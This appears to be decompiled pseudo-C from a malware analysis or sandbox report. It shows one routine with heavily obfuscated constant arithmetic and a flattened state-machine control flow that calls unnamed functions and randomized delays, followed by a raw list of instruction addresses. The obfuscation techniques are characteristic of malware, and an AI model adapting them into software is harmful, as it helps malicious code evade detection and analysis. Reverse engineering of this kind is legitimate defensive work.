				_v284 = _v284 ^ 0xd5ef4560;
				_v480 = 0x31c7;
				_v480 = _v480 + 0x982a;
				_v480 = _v480 << 0xd;
				_v480 = _v480 + 0xc9d7;
				_v480 = _v480 ^ 0x193e8817;
				_v396 = 0xb7f2;
				_v396 = _v396 + 0xb566;
				_v396 = _v396 + 0xda08;
				_v396 = _v396 ^ 0x00024958;
				_v256 = 0xd53e;
				_v256 = _v256 + 0xffff4a14;
				_v256 = _v256 ^ 0x00006f69;
				_v228 = 0x32d4;
				_v228 = _v228 * 0x15;
				_v228 = _v228 ^ 0x00042ea7;
				_v340 = 0x96a;
				_t1200 = 0x6c;
				_v340 = _v340 / _t1200;
				_v340 = _v340 | 0x4730b43d;
				_v340 = _v340 ^ 0x4730c280;
				_v420 = 0x42c4;
				_t1201 = 0x7c;
				_v420 = _v420 / _t1201;
				_v420 = _v420 ^ 0xb0a1ac1b;
				_v420 = _v420 ^ 0xb0a1e8da;
				_v544 = 0xf6dd;
				_v544 = _v544 << 1;
				_v544 = _v544 << 0xd;
				_v544 = _v544 + 0x6cb9;
				_v544 = _v544 ^ 0x3db7bb4a;
				_v200 = 0x4231;
				_t1202 = 0x41;
				_v200 = _v200 * 0x75;
				_v200 = _v200 ^ 0x001e7faf;
				_v176 = 0xa2d9;
				_v176 = _v176 + 0xffff644f;
				_v176 = _v176 ^ 0x000018c6;
				_v536 = 0xa9a1;
				_v536 = _v536 * 0x60;
				_v536 = _v536 | 0xfebffedf;
				_v536 = _v536 ^ 0xfebfa2dc;
				_v404 = 0x236c;
				_v404 = _v404 + 0xde4a;
				_v404 = _v404 << 0xc;
				_v404 = _v404 ^ 0x101b6517;
				_v476 = 0x4a9b;
				_v476 = _v476 + 0xb3d1;
				_v476 = _v476 | 0x1b947aec;
				_v476 = _v476 >> 0x10;
				_v476 = _v476 ^ 0x000047ac;
				_v380 = 0xdac2;
				_v380 = _v380 + 0xffff8154;
				_v380 = _v380 << 2;
				_v380 = _v380 ^ 0x00014bf4;
				_v160 = 0x7fd3;
				_v160 = _v160 << 0xc;
				_v160 = _v160 ^ 0x07fd17c7;
				_v232 = 0x6c02;
				_v232 = _v232 / _t1202;
				_v232 = _v232 ^ 0x00000a74;
				_v444 = 0xc1b5;
				_t1203 = 0x7e;
				_v444 = _v444 * 0x65;
				_v444 = _v444 ^ 0x139ab27c;
				_v444 = _v444 >> 0xe;
				_v444 = _v444 ^ 0x00002836;
				_v460 = 0xbbc1;
				_v460 = _v460 + 0x541c;
				_v460 = _v460 / _t1203;
				_v460 = _v460 >> 2;
				_v460 = _v460 ^ 0x00005e3f;
				_v224 = 0xc4ba;
				_v224 = _v224 + 0xe0b2;
				_v224 = _v224 ^ 0x00019464;
				_v356 = 0x4aed;
				_v356 = _v356 | 0xa8125727;
				_v356 = _v356 << 6;
				_v356 = _v356 ^ 0x04978e60;
				_v500 = 0x8bcb;
				_t1093 = 7;
				_t1204 = 0x39;
				_v500 = _v500 * 9;
				_v500 = _v500 ^ 0x3b13b652;
				_v500 = _v500 / _t1093;
				_v500 = _v500 ^ 0x0871452a;
				_v560 = 0xdccf;
				_v560 = _v560 + 0xffff66fd;
				_v560 = _v560 * 0x6b;
				_v560 = _v560 * 0x42;
				_v560 = _v560 ^ 0x074e4505;
				_v308 = 0x81ec;
				_v308 = _v308 + 0x1dde;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x27f29ee4;
				_v492 = 0xd6e1;
				_v492 = _v492 << 4;
				_v492 = _v492 << 8;
				_v492 = _v492 << 3;
				_v492 = _v492 ^ 0x6b70840d;
				_v384 = 0x8b45;
				_v384 = _v384 / _t1204;
				_t1205 = 0x47;
				_v384 = _v384 / _t1205;
				_v384 = _v384 ^ 0x00000d12;
				_v360 = 0xb085;
				_v360 = _v360 ^ 0xd8410577;
				_v360 = _v360 >> 9;
				_v360 = _v360 ^ 0x006c1250;
				_v368 = 0xcf2b;
				_v368 = _v368 >> 0x10;
				_v368 = _v368 << 4;
				_v368 = _v368 ^ 0x000068b4;
				_v376 = 0x5c77;
				_v376 = _v376 * 0x41;
				_v376 = _v376 + 0xffff974f;
				_v376 = _v376 ^ 0x001738a1;
				_v496 = 0xaa30;
				_v496 = _v496 << 6;
				_v496 = _v496 | 0x410a4c68;
				_v496 = _v496 * 0x31;
				_v496 = _v496 ^ 0x79313fdc;
				_v452 = 0xc5d3;
				_v452 = _v452 << 0xb;
				_v452 = _v452 | 0x8332a5d6;
				_v452 = _v452 << 4;
				_v452 = _v452 ^ 0x73ebff91;
				_v540 = 0x5fe6;
				_v540 = _v540 + 0x8c36;
				_v540 = _v540 + 0xfffff306;
				_v540 = _v540 + 0xe335;
				_v540 = _v540 ^ 0x0001ed35;
				_v532 = 0x8e9b;
				_v532 = _v532 * 0x27;
				_v532 = _v532 ^ 0xc7071994;
				_v532 = _v532 | 0x7190d13c;
				_v532 = _v532 ^ 0xf7928315;
				_v168 = 0x21d6;
				_v168 = _v168 + 0xffff7189;
				_v168 = _v168 ^ 0xffff9ff4;
				_v504 = 0xd3e3;
				_v504 = _v504 + 0x48e3;
				_v504 = _v504 ^ 0x96c92b34;
				_v504 = _v504 + 0xffff9ae2;
				_v504 = _v504 ^ 0x96c7da21;
				_v484 = 0x90e;
				_v484 = _v484 ^ 0xd2d7c067;
				_v484 = _v484 >> 6;
				_v484 = _v484 ^ 0xd4c96012;
				_v484 = _v484 ^ 0xd7820f73;
				_v324 = 0xe4f5;
				_v324 = _v324 ^ 0xfb2f0ae8;
				_v324 = _v324 + 0xbfe;
				_v324 = _v324 ^ 0xfb2f8388;
				_v400 = 0x7049;
				_v400 = _v400 ^ 0x1ba178d8;
				_t1206 = 0x50;
				_v400 = _v400 * 0x1f;
				_v400 = _v400 ^ 0x588065be;
				_v260 = 0x89e7;
				_v260 = _v260 >> 0xf;
				_v260 = _v260 ^ 0x00002b9f;
				_v244 = 0x4159;
				_v244 = _v244 >> 8;
				_v244 = _v244 ^ 0x00005d4c;
				_v520 = 0xd1a7;
				_v520 = _v520 * 0x58;
				_v520 = _v520 << 0xc;
				_v520 = _v520 + 0xffff83b2;
				_v520 = _v520 ^ 0x81165e0d;
				_v252 = 0x675e;
				_v252 = _v252 + 0x19b2;
				_v252 = _v252 ^ 0x0000ae51;
				_v392 = 0x1499;
				_v392 = _v392 << 9;
				_v392 = _v392 + 0xffff09a2;
				_v392 = _v392 ^ 0x002848e0;
				_v512 = 0xf6eb;
				_v512 = _v512 + 0xffff2177;
				_v512 = _v512 ^ 0xaf5f6e3b;
				_v512 = _v512 ^ 0xa20e8793;
				_v512 = _v512 ^ 0x0d51fdfe;
				_v336 = 0x102a;
				_v336 = _v336 + 0xffffc12b;
				_v336 = _v336 + 0x992e;
				_v336 = _v336 ^ 0x000048b0;
				_v236 = 0xc7dd;
				_v236 = _v236 + 0x5a5d;
				_v236 = _v236 ^ 0x000135b9;
				_v488 = 0x986e;
				_v488 = _v488 * 0x5f;
				_v488 = _v488 + 0xffff2eab;
				_v488 = _v488 ^ 0x4bd47303;
				_v488 = _v488 ^ 0x4be38ed6;
				_v472 = 0x6af0;
				_v472 = _v472 + 0xc863;
				_v472 = _v472 / _t1206;
				_t1207 = 0x3f;
				_v472 = _v472 / _t1207;
				_v472 = _v472 ^ 0x00005e7c;
				_v220 = 0xfb72;
				_v220 = _v220 | 0x981e77fa;
				_v220 = _v220 ^ 0x981ef6e3;
				_v464 = 0xc06c;
				_v464 = _v464 >> 5;
				_v464 = _v464 + 0xd198;
				_v464 = _v464 << 8;
				_v464 = _v464 ^ 0x00d7a9ca;
				_v312 = 0x83c6;
				_v312 = _v312 >> 0xf;
				_t1208 = 0x2a;
				_v312 = _v312 / _t1208;
				_v312 = _v312 ^ 0x0000748c;
				_v320 = 0x52c6;
				_v320 = _v320 + 0xffffa273;
				_v320 = _v320 + 0x6f66;
				_v320 = _v320 ^ 0x00004fc2;
				_v456 = 0x4e2a;
				_v456 = _v456 | 0xd38047d3;
				_v456 = _v456 + 0xffff9170;
				_t1209 = 0x14;
				_v456 = _v456 / _t1209;
				_v456 = _v456 ^ 0x0a93340f;
				_v328 = 0x84cf;
				_v328 = _v328 | 0xc59169e0;
				_v328 = _v328 + 0x6f96;
				_v328 = _v328 ^ 0xc592396d;
				_v448 = 0xfac;
				_v448 = _v448 >> 4;
				_t1210 = 0x6e;
				_v448 = _v448 / _t1210;
				_v448 = _v448 << 2;
				_v448 = _v448 ^ 0x00001dd7;
				_v212 = 0xa2c2;
				_v212 = _v212 ^ 0x0893172c;
				_v212 = _v212 ^ 0x0893c72a;
				_v440 = 0xc3d2;
				_v440 = _v440 >> 5;
				_v440 = _v440 << 0xd;
				_t1211 = 0x71;
				_v440 = _v440 * 0x19;
				_v440 = _v440 ^ 0x131d8707;
				_v196 = 0x539;
				_v196 = _v196 | 0xc76f09e9;
				_v196 = _v196 ^ 0xc76f108f;
				_v204 = 0x154e;
				_v204 = _v204 >> 0xa;
				_v204 = _v204 ^ 0x00006664;
				_v432 = 0xfcbd;
				_v432 = _v432 / _t1211;
				_v432 = _v432 + 0xe5cb;
				_v432 = _v432 << 0xa;
				_v432 = _v432 ^ 0x03a053eb;
				_v304 = 0x778d;
				_v304 = _v304 + 0x928a;
				_t1212 = 0x7a;
				_v304 = _v304 / _t1212;
				_v304 = _v304 ^ 0x00004238;
				_v316 = 0x33c;
				_v316 = _v316 << 0xe;
				_v316 = _v316 + 0xffffae02;
				_v316 = _v316 ^ 0x00cea70f;
				_v468 = 0x9824;
				_t1192 = 0x6f;
				_v468 = _v468 / _t1192;
				_v468 = _v468 + 0xffff818c;
				_t1213 = 0x2d;
				_v468 = _v468 / _t1213;
				_v468 = _v468 ^ 0x05b00d26;
				_v516 = 0x6571;
				_v516 = _v516 / _t1192;
				_v516 = _v516 << 0xe;
				_v516 = _v516 + 0xffff691a;
				_v516 = _v516 ^ 0x0039f65a;
				_v364 = 0x8f76;
				_v364 = _v364 | 0xb3117de9;
				_v364 = _v364 + 0xffff2e20;
				_v364 = _v364 ^ 0xb3117092;
				_v508 = 0x61d4;
				_t1214 = 0x56;
				_v508 = _v508 * 0x5f;
				_v508 = _v508 / _t1214;
				_v508 = _v508 + 0x6879;
				_v508 = _v508 ^ 0x0000b523;
				_v556 = 0xa1b8;
				_t1215 = 0x2e;
				_v556 = _v556 * 0x68;
				_v556 = _v556 * 0x63;
				_v556 = _v556 << 2;
				_v556 = _v556 ^ 0x65a0e423;
				_v280 = 0xf392;
				_v280 = _v280 * 0x63;
				_v280 = _v280 ^ 0x78f7b80d;
				_v280 = _v280 ^ 0x78a9e3a2;
				_v172 = 0x7b9d;
				_v172 = _v172 + 0xffff627f;
				_v172 = _v172 ^ 0xffffa88d;
				_v216 = 0x6704;
				_v216 = _v216 + 0xcaa9;
				_v216 = _v216 ^ 0x00014502;
				_v348 = 0x738a;
				_v348 = _v348 ^ 0xe36f6706;
				_v348 = _v348 << 0xd;
				_v348 = _v348 ^ 0xe29183b5;
				_v164 = 0x54d1;
				_v164 = _v164 + 0x29c7;
				_v164 = _v164 ^ 0x0000560f;
				_v436 = 0xf108;
				_v436 = _v436 / _t1215;
				_v436 = _v436 + 0xffffcfd7;
				_v436 = _v436 + 0xffffcbf2;
				_v436 = _v436 ^ 0xffffe07a;
				_v524 = 0x9e18;
				_v524 = _v524 + 0xffffc415;
				_v524 = _v524 | 0x606d12e6;
				_v524 = _v524 ^ 0x547ddac5;
				_v524 = _v524 ^ 0x3410f8de;
				_v416 = 0x6ca7;
				_v416 = _v416 * 0x52;
				_v416 = _v416 * 0x46;
				_v416 = _v416 ^ 0x09846d74;
				_v296 = 0x6b20;
				_v296 = _v296 >> 0x10;
				_v296 = _v296 | 0x10740d98;
				_v296 = _v296 ^ 0x10746aaa;
				_v180 = 0x8240;
				_v180 = _v180 + 0xfffff4eb;
				_v180 = _v180 ^ 0x00005d37;
				_v208 = 0xd204;
				_t1216 = 0x44;
				_t1094 = _v152;
				_t1193 = _v156;
				_v208 = _v208 * 9;
				_v208 = _v208 ^ 0x000707cd;
				_v276 = 0x5f97;
				_v276 = _v276 >> 7;
				_v276 = _v276 + 0xffff3a76;
				_v276 = _v276 ^ 0xffff7a0d;
				_v184 = 0x8218;
				_v184 = _v184 ^ 0xc24e7798;
				_v184 = _v184 ^ 0xc24e92dc;
				_v264 = 0xe4dc;
				_v264 = _v264 + 0x5433;
				_v264 = _v264 ^ 0x00011499;
				_v188 = 0x7ac1;
				_t1223 = _v264;
				_v188 = _v188 * 0x5e;
				_v188 = _v188 ^ 0x002d4a1f;
				_v268 = 0xe7b6;
				_v268 = _v268 * 0x75;
				_v268 = _v268 << 5;
				_v268 = _v268 ^ 0x0d3ce796;
				_v428 = 0xfe35;
				_v428 = _v428 | 0x2bff5b77;
				_v428 = _v428 + 0x66fc;
				_v428 = _v428 ^ 0x2c0065c8;
				_v272 = 0xe39c;
				_v272 = _v272 + 0xffff2d90;
				_v272 = _v272 >> 0x10;
				_v272 = _v272 ^ 0x000035e0;
				_v548 = 0x3083;
				_v548 = _v548 | 0x51b2bf79;
				_v548 = _v548 + 0xffff5659;
				_v548 = _v548 ^ 0x9c5fbfd9;
				_v548 = _v548 ^ 0xcdedd157;
				_v248 = 0x9c64;
				_v248 = _v248 + 0x392c;
				_v248 = _v248 ^ 0x00009caf;
				_v192 = 0xe929;
				_v192 = _v192 + 0xfffff3cb;
				_v192 = _v192 ^ 0x0000c4f8;
				_v388 = 0x9fa8;
				_v388 = _v388 << 9;
				_v388 = _v388 ^ 0xec84449d;
				_v388 = _v388 ^ 0xedbb4000;
				_v424 = 0xac1c;
				_v424 = _v424 * 0x5b;
				_v424 = _v424 << 3;
				_v424 = _v424 / _t1216;
				_v424 = _v424 ^ 0x0007165b;
				_v412 = 0x527a;
				_v412 = _v412 + 0xffffa879;
				_v412 = _v412 | 0x26c13b46;
				_v412 = _v412 ^ 0xfffffee4;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t1235 = _t1096 - 0x1de2d3e5;
							if(_t1235 > 0) {
								goto L61;
							}
							L3:
							if(_t1235 == 0) {
								_t1020 = E002946C0(_t1096, __eflags);
								__eflags = _t1020;
								if(__eflags == 0) {
									L112:
									return _t1020;
								}
								_t1096 = 0x5c80354;
								while(1) {
									L2:
									_t1235 = _t1096 - 0x1de2d3e5;
									if(_t1235 > 0) {
										goto L61;
									}
									goto L3;
								}
								goto L61;
							}
							_t1236 = _t1096 - 0xfcc2a91;
							if(_t1236 > 0) {
								__eflags = _t1096 - 0x181af132;
								if(__eflags > 0) {
									__eflags = _t1096 - 0x1882a564;
									if(__eflags == 0) {
										_t1188 = _v216;
										_t1020 = E002A3745(_v172, _t1188, __eflags, _v348, _v164,  &_v124);
										_t1227 = _t1227 + 0xc;
										__eflags = _t1020;
										if(__eflags != 0) {
											asm("xorps xmm0, xmm0");
											_t1223 = 0x27f3eb9e;
											asm("movlpd [esp+0x1a8], xmm0");
											_t1094 = _v152;
											_t1193 = _v156;
										}
										L58:
										_t1096 = 0x168f72b9;
										continue;
									}
									__eflags = _t1096 - 0x18e9918c;
									if(__eflags == 0) {
										_t1096 = 0x361af6e7;
										continue;
									}
									__eflags = _t1096 - 0x1c904052;
									if(__eflags == 0) {
										_push(_v444);
										_v148 = E002A23BC( &_v144, _v160, __eflags, _v232, _t1096);
										E002AA094( &_v144,  &_v148, __eflags, _v460, _v224, _v356, _v500);
										_t1188 = _v148;
										_t1020 = E0029F935(_v560, _t1188, _v308, _v492);
										_t1227 = _t1227 + 0x24;
										_t1096 = 0x18e9918c;
										continue;
									}
									__eflags = _t1096 - 0x1dcb1bf4;
									if(_t1096 != 0x1dcb1bf4) {
										break;
									}
									_t1188 = _v88;
									_t1020 = E0029EF80(_v276, _t1188, _v184);
									L34:
									_t1096 = 0x38fcb7;
									continue;
								}
								if(__eflags == 0) {
									_t1188 = _v468;
									_t1020 = E0029792C(_v316, _t1188, _v516,  &_v124,  &_v132);
									_t1227 = _t1227 + 0xc;
									__eflags = _t1020;
									if(__eflags == 0) {
										goto L58;
									}
									_t1020 = E002ACFB6();
									__eflags = _v116;
									_t1096 = 0x4363fef;
									if(__eflags != 0) {
										__eflags = _v116 - 7;
										_t1096 =  ==  ? 0xfcc2a91 : 0x4363fef;
									}
									continue;
								}
								__eflags = _t1096 - 0x11417d6c;
								if(_t1096 == 0x11417d6c) {
									_t1020 = E0029F471();
									goto L112;
								}
								__eflags = _t1096 - 0x116d33a8;
								if(_t1096 == 0x116d33a8) {
									_t1020 = E002A8978();
									asm("sbb ecx, ecx");
									_t1096 = ( ~_t1020 & 0x07e38455) + 0x2614d4c0;
									continue;
								}
								__eflags = _t1096 - 0x167196bc;
								if(_t1096 == 0x167196bc) {
									_t1020 = E0029B0E1();
									asm("sbb ecx, ecx");
									_t1117 =  ~_t1020 & 0x05d9a0ad;
									__eflags = _t1117;
									L44:
									_t1096 = _t1117 + 0xb67dcbf;
									continue;
								}
								__eflags = _t1096 - 0x168f72b9;
								if(_t1096 != 0x168f72b9) {
									break;
								}
								_t1188 = _v132;
								_t1020 = E0029EF80(_v436, _t1188, _v524);
								_t1096 = 0x375880e8;
								continue;
							}
							if(_t1236 == 0) {
								_t1020 = E00294828();
								goto L112;
							}
							_t1237 = _t1096 - 0x9773d10;
							if(_t1237 > 0) {
								__eflags = _t1096 - 0xa272b1b;
								if(__eflags == 0) {
									_v96 = 0x1346150;
									_t1096 = 0xe35770d;
									continue;
								}
								__eflags = _t1096 - 0xb67dcbf;
								if(_t1096 == 0xb67dcbf) {
									E0029427A();
									_t1223 = 0x2f9ed7a0;
									_t1020 = E0029FA50();
									_t1193 = _t1020;
									_t1094 = _t1188;
									goto L34;
								}
								__eflags = _t1096 - 0xe35770d;
								if(__eflags == 0) {
									_v92 = 0xfa0;
									_t1096 = 0x27f3eb9e;
									continue;
								}
								__eflags = _t1096 - 0xfc32371;
								if(_t1096 != 0xfc32371) {
									break;
								}
								_t1020 = E0029766F(_v540,  &_v68);
								__eflags = _t1020;
								if(__eflags == 0) {
									L20:
									_t1096 = 0x3410c786;
									continue;
								}
								_t1188 = _v168;
								_v112 =  &_v68;
								_t1020 = E002A997D(_v532, _t1188,  &_v68);
								_v108 = _t1020;
								_t1096 = 0x268db8a6;
								continue;
							}
							if(_t1237 == 0) {
								_t1020 = E002A5B60();
								_v104 = _t1020;
								_t1096 = 0x390dda0;
								continue;
							}
							if(_t1096 == 0x38fcb7) {
								_t1020 = _t1193 | _t1094;
								__eflags = _t1020;
								if(__eflags != 0) {
									_t1033 = E002A8E0A(0x5dc, _t1188, __eflags, 0x1f4);
									_t1227 = _t1227 - 0xc + 0x10;
									_t1020 = E00296938(__eflags, _t1033, _t1033);
									__eflags = _t1020;
									if(__eflags == 0) {
										_t1020 = E0029FA50();
										__eflags = _t1188 - _t1094;
										if(__eflags < 0) {
											L24:
											_t1096 = 0x38fcb7;
											break;
										}
										if(__eflags > 0) {
											goto L18;
										}
										__eflags = _t1020 - _t1193;
										if(_t1020 >= _t1193) {
											goto L18;
										}
										goto L24;
									}
									goto L20;
								}
								L18:
								_t1096 = _t1223;
								break;
							}
							if(_t1096 == 0x390dda0) {
								_t1020 = E002A8313();
								_v100 = _t1020;
								_t1096 = 0xa272b1b;
								continue;
							}
							if(_t1096 == 0x4363fef) {
								_t1020 = E0029D4BB();
								_t1096 = 0x1882a564;
								continue;
							}
							if(_t1096 == 0x5c80354) {
								_t1020 = E002A4B3E(); // executed
								_t1096 = 0x30d775bc;
								continue;
							}
							if(_t1096 != 0x75b7379) {
								break;
							} else {
								_t1020 = E002A5748();
								_t1096 = 0x38750a8d;
								continue;
							}
							L61:
							__eflags = _t1096 - 0x2f9ed7a0;
							if(__eflags > 0) {
								__eflags = _t1096 - 0x3753589a;
								if(__eflags > 0) {
									__eflags = _t1096 - 0x375880e8;
									if(_t1096 == 0x375880e8) {
										E0029EF80(_v416, _v140, _v296);
										_t1096 = 0x206488c6;
										break;
									}
									__eflags = _t1096 - 0x386459ce;
									if(_t1096 == 0x386459ce) {
										_push( &_v140);
										_t1188 = _v472;
										_t1010 = E002A39E1( &_v132, _t1188, _t1096, _v220);
										_t1229 = _t1227 + 0xc;
										__eflags = _t1010;
										if(__eflags == 0) {
											E0029DC60();
											_t1223 = 0x27f3eb9e;
											_t1019 = E002A8E0A(0x1f40, _t1188, __eflags, 0xfa0);
											_t1227 = _t1229 - 0xc + 0x10;
											_t1020 = E0029FA50();
											_t1094 = _t1188;
											_t1193 = _t1020 + _t1019;
											_t1096 = 0x375880e8;
											asm("adc ebx, 0x0");
										} else {
											_t1223 = 0x27f3eb9e;
											_t1091 = E002A8E0A(0xe09c0, _t1188, __eflags, 0xdbba0);
											_t1227 = _t1229 - 0xc + 0x10;
											_t1020 = E0029FA50();
											_t1094 = _t1188;
											_t1193 = _t1020 + _t1091;
											_t1096 = 0x181af132;
											asm("adc ebx, 0x0");
										}
										while(1) {
											L1:
											goto L2;
										}
									}
									__eflags = _t1096 - 0x386a45e7;
									if(_t1096 == 0x386a45e7) {
										_t1020 = E002983F0();
										__eflags = _t1020;
										if(__eflags == 0) {
											goto L112;
										}
										_t1096 = 0x25f1bc45;
										continue;
									}
									__eflags = _t1096 - 0x38750a8d;
									if(_t1096 != 0x38750a8d) {
										break;
									}
									_t1020 = E0029C3C2();
									_t1096 = 0x2df85915;
									continue;
								}
								if(__eflags == 0) {
									_t1096 = 0x1de2d3e5;
									continue;
								}
								__eflags = _t1096 - 0x30446cda;
								if(_t1096 == 0x30446cda) {
									_t1188 =  &_v140;
									_t1020 = E0029FFB5(_v336, _t1188, _v236,  &_v112, _v488);
									_t1227 = _t1227 + 0xc;
									asm("sbb ecx, ecx");
									_t1096 = ( ~_t1020 & 0x17ffd108) + 0x206488c6;
									continue;
								}
								__eflags = _t1096 - 0x30d775bc;
								if(_t1096 == 0x30d775bc) {
									_t1020 = E0029E360();
									__eflags = _t1020;
									if(_t1020 == 0) {
										goto L112;
									}
									_t1020 = E002A97DA(_v344);
									_t1096 = 0x116d33a8;
									continue;
								}
								__eflags = _t1096 - 0x3410c786;
								if(_t1096 == 0x3410c786) {
									_t1020 = E002981A0(_t1096);
									goto L112;
								}
								__eflags = _t1096 - 0x361af6e7;
								if(__eflags != 0) {
									break;
								}
								_t1223 = 0xfc32371;
								_t1067 = E002A8E0A(0x2710, _t1188, __eflags, 0x1388);
								_t1227 = _t1227 - 0xc + 0x10;
								_t1020 = E0029FA50();
								_t1094 = _t1188;
								_t1193 = _t1020 + _t1067;
								_t1096 = 0x38fcb7;
								asm("adc ebx, 0x0");
								goto L1;
							}
							if(__eflags == 0) {
								_t1096 = 0x1c904052;
								continue;
							}
							__eflags = _t1096 - 0x2614d4c0;
							if(__eflags > 0) {
								__eflags = _t1096 - 0x268db8a6;
								if(__eflags == 0) {
									_t1020 = E002A7FBC();
									_v72 = _t1020;
									_t1096 = 0x9773d10;
									continue;
								}
								__eflags = _t1096 - 0x26efdeea;
								if(_t1096 == 0x26efdeea) {
									_t1188 =  &_v80;
									_t1020 = E002A651C(_v392, _t1188, _v512);
									_t1096 = 0x30446cda;
									continue;
								}
								__eflags = _t1096 - 0x27f3eb9e;
								if(_t1096 == 0x27f3eb9e) {
									_t1188 = _v520;
									_t1020 = E002A7A50(_v244, _t1188,  &_v88, _v252);
									_t1096 = 0x26efdeea;
									continue;
								}
								__eflags = _t1096 - 0x2df85915;
								if(_t1096 != 0x2df85915) {
									break;
								}
								_t1020 = E002AC19B();
								_t1096 = 0x386a45e7;
								continue;
							}
							if(__eflags == 0) {
								__eflags = E0029FB04();
								if(__eflags == 0) {
									_t1020 = E0029FFA9();
									asm("sbb ecx, ecx");
									_t1096 = ( ~_t1020 & 0xcee668ec) + 0x38750a8d;
									continue;
								}
								_t1020 = E0029FFA9();
								asm("sbb ecx, ecx");
								_t1117 =  ~_t1020 & 0x0b09b9fd;
								goto L44;
							}
							__eflags = _t1096 - 0x1fe87560;
							if(_t1096 == 0x1fe87560) {
								_t1020 = E00298DBB();
								_t1096 = 0x11417d6c;
								continue;
							}
							__eflags = _t1096 - 0x204c3e9e;
							if(_t1096 == 0x204c3e9e) {
								_t1020 = E00294D5F();
								_t1096 = 0x1fe87560;
								continue;
							}
							__eflags = _t1096 - 0x206488c6;
							if(_t1096 == 0x206488c6) {
								_t1188 = _v80;
								_t1020 = E0029EF80(_v180, _t1188, _v208);
								_t1096 = 0x1dcb1bf4;
								continue;
							}
							__eflags = _t1096 - 0x25f1bc45;
							if(_t1096 != 0x25f1bc45) {
								break;
							}
							E00296E8A();
							_t1020 = E0029FFA9();
							asm("sbb ecx, ecx");
							_t1096 = ( ~_t1020 & 0x0063c93e) + 0x1fe87560;
						}
						__eflags = _t1096 - 0x2d9f3e5e;
					} while (__eflags != 0);
					goto L112;
				}
			}

0x0029971c
0x00299726
0x00299730
0x00299735
0x0029973a
0x00299742
0x0029974a
0x00299752
0x0029975d
0x00299768
0x00299773
0x0029977e
0x00299789
0x00299794
0x0029979c
0x002997a7
0x002997b2
0x002997ba
0x002997c5
0x002997d0
0x002997e4
0x002997e7
0x002997f6
0x002997fd
0x00299808
0x00299813
0x0029981e
0x00299829
0x00299834
0x0029983f
0x0029984a
0x00299852
0x0029985d
0x00299868
0x00299870
0x0029987b
0x00299886
0x0029988e
0x00299896
0x0029989b
0x002998a3
0x002998ab
0x002998be
0x002998c5
0x002998d0
0x002998db
0x002998ee
0x002998f5
0x00299900
0x00299913
0x0029991a
0x00299922
0x0029992d
0x00299935
0x0029993d
0x00299942
0x0029994a
0x00299952
0x0029995d
0x00299968
0x00299973
0x0029997e
0x00299989
0x00299994
0x0029999f
0x002999b2
0x002999b9
0x002999c4
0x002999da
0x002999df
0x002999e8
0x002999f3
0x002999fe
0x00299a10
0x00299a15
0x00299a1e
0x00299a29
0x00299a34
0x00299a3c
0x00299a40
0x00299a45
0x00299a4d
0x00299a55
0x00299a68
0x00299a6b
0x00299a72
0x00299a7d
0x00299a88
0x00299a93
0x00299a9e
0x00299aab
0x00299aaf
0x00299ab7
0x00299abf
0x00299aca
0x00299ad5
0x00299add
0x00299ae8
0x00299af0
0x00299af8
0x00299b00
0x00299b05
0x00299b0d
0x00299b18
0x00299b23
0x00299b2b
0x00299b36
0x00299b41
0x00299b49
0x00299b54
0x00299b6a
0x00299b71
0x00299b7c
0x00299b8f
0x00299b90
0x00299b97
0x00299ba2
0x00299baa
0x00299bb5
0x00299bbd
0x00299bcb
0x00299bcf
0x00299bd4
0x00299bdc
0x00299be7
0x00299bf2
0x00299bfd
0x00299c08
0x00299c13
0x00299c1b
0x00299c26
0x00299c37
0x00299c3a
0x00299c3b
0x00299c3f
0x00299c4f
0x00299c53
0x00299c5b
0x00299c63
0x00299c72
0x00299c7b
0x00299c7f
0x00299c87
0x00299c92
0x00299c9d
0x00299ca5
0x00299cb0
0x00299cb8
0x00299cbd
0x00299cc2
0x00299cc7
0x00299ccf
0x00299ce5
0x00299cf3
0x00299cf6
0x00299cfd
0x00299d08
0x00299d13
0x00299d1e
0x00299d26
0x00299d31
0x00299d3c
0x00299d44
0x00299d4c
0x00299d57
0x00299d6a
0x00299d71
0x00299d7c
0x00299d87
0x00299d8f
0x00299d94
0x00299da1
0x00299da5
0x00299dad
0x00299db8
0x00299dc0
0x00299dcb
0x00299dd3
0x00299dde
0x00299de6
0x00299dee
0x00299df6
0x00299dfe
0x00299e06
0x00299e13
0x00299e17
0x00299e1f
0x00299e27
0x00299e2f
0x00299e3a
0x00299e45
0x00299e50
0x00299e58
0x00299e60
0x00299e68
0x00299e72
0x00299e7a
0x00299e82
0x00299e8a
0x00299e8f
0x00299e97
0x00299e9f
0x00299eaa
0x00299eb5
0x00299ec0
0x00299ecb
0x00299ed6
0x00299eeb
0x00299eee
0x00299ef5
0x00299f00
0x00299f0b
0x00299f13
0x00299f1e
0x00299f29
0x00299f31
0x00299f3c
0x00299f49
0x00299f4d
0x00299f52
0x00299f5a
0x00299f62
0x00299f6d
0x00299f78
0x00299f83
0x00299f8e
0x00299f96
0x00299fa1
0x00299fac
0x00299fb4
0x00299fbc
0x00299fc4
0x00299fcc
0x00299fd4
0x00299fdf
0x00299fea
0x00299ff5
0x0029a000
0x0029a00b
0x0029a016
0x0029a021
0x0029a02e
0x0029a032
0x0029a03a
0x0029a042
0x0029a04a
0x0029a052
0x0029a062
0x0029a06a
0x0029a06f
0x0029a073
0x0029a07b
0x0029a086
0x0029a091
0x0029a09c
0x0029a0a4
0x0029a0a9
0x0029a0b1
0x0029a0b6
0x0029a0be
0x0029a0c9
0x0029a0da
0x0029a0df
0x0029a0e8
0x0029a0f3
0x0029a0fe
0x0029a109
0x0029a114
0x0029a11f
0x0029a12a
0x0029a135
0x0029a147
0x0029a14c
0x0029a155
0x0029a160
0x0029a16b
0x0029a176
0x0029a181
0x0029a18c
0x0029a197
0x0029a1a6
0x0029a1ab
0x0029a1b4
0x0029a1bc
0x0029a1c7
0x0029a1d2
0x0029a1dd
0x0029a1e8
0x0029a1f3
0x0029a1fb
0x0029a20b
0x0029a20e
0x0029a215
0x0029a220
0x0029a22b
0x0029a236
0x0029a241
0x0029a24c
0x0029a254
0x0029a25f
0x0029a275
0x0029a27c
0x0029a287
0x0029a28f
0x0029a29a
0x0029a2a5
0x0029a2b7
0x0029a2bc
0x0029a2c5
0x0029a2d0
0x0029a2db
0x0029a2e3
0x0029a2ee
0x0029a2f9
0x0029a305
0x0029a30a
0x0029a30e
0x0029a31c
0x0029a321
0x0029a325
0x0029a32d
0x0029a33d
0x0029a343
0x0029a348
0x0029a350
0x0029a358
0x0029a363
0x0029a36e
0x0029a379
0x0029a384
0x0029a391
